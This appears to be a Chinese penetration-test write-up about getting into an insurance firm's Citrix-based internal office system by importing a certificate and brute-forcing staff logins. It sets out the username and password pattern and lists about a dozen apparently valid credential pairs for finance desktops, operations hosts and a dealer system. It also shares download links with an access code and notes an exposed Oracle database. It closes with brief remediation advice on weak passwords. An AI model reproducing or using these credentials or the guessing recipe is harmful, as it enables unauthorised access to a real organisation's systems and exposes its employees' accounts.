等了这么久还是有结果的啊.
之前遇到的证书问题得以解决 又爆破了几个账号
他上传了最新5月31号证书 又看到他每隔1段时间就上传证书 想必证书是按服务端有限期的
http://pan.baidu.com/share/home?uk=3257785095#category/type=0
#1将证书导入成信任根证书
下载 citrix xenapp 应用
链接:http://pan.baidu.com/s/1cFRWJk 密码:67k9
#1进入内网OA
此百度云地址弄清楚是谁的吧
爆破思路:
首先如果要进入运维 财务等桌面结尾必定 ghq
利用目前资源 ygbx和他本身姓名可作为密码条件之一 结合之前的漏洞
返回339则成功
login=yangli-ghq&passwd=ygbx321! --经代车商系统
login=zhangjianmin-ghq&passwd=ygbx123# --财务移动办公
运维主机
login=lijing-ghq&passwd=lijing123!
login=zhouwei-ghq&passwd=zhouwei123!
login=wangdan-ghq&passwd=wangdan123!
login=xieli-ghq&passwd=xieli123!
财务桌面
login=zhangdan-ghq&passwd=zhangdan321!
login=liyun-ghq&passwd=liyun123!
无权限号
login=chenwei-ghq&passwd=ygbx123@
login=lidandan-ghq&passwd=ygbx123@
login=zhaowei-ghq&passwd=ygbx123#
登录各大系统
登录财务桌面
login=zhangdan-ghq&passwd=zhangdan321!
登录某运维人员桌面
login=lijing-ghq&passwd=lijing123!
oralce数据库没关
解决方案:
1.员工安全意识问题
2.弱口令问题(不要设置和用户名,公司名等简单密码组合)
3.远程计算机 数据库等操作下机请关闭
4.本次渗透,没有动任何主机数据